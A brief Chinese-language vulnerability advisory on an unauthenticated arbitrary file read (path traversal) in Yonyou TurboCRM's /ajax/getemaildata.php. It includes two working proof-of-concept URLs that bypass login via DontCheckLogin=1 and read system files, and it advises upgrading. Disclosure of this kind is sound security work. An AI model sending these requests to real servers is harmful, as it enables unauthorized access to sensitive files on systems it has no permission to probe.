### 漏洞信息:
用友TurboCRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。
用友TurboCRM /ajax/getemaildata.php 存在任意文件读取漏洞导致敏感信息泄漏。
### 漏洞分析:
漏洞存在于/ajax/getemaildata.php filePath参数未有效过滤,导致可以使用 ../../ 越权读取任意文件。
可使用以下URl测试读取系统文件:
```
http://xxx.xxx.xxx/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt
http://xxx.xxx.xxx/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts
```
### 解决方案:
建议关注官网网站,及时升级最新版本:
http://www.yonyou.com/
暂无评论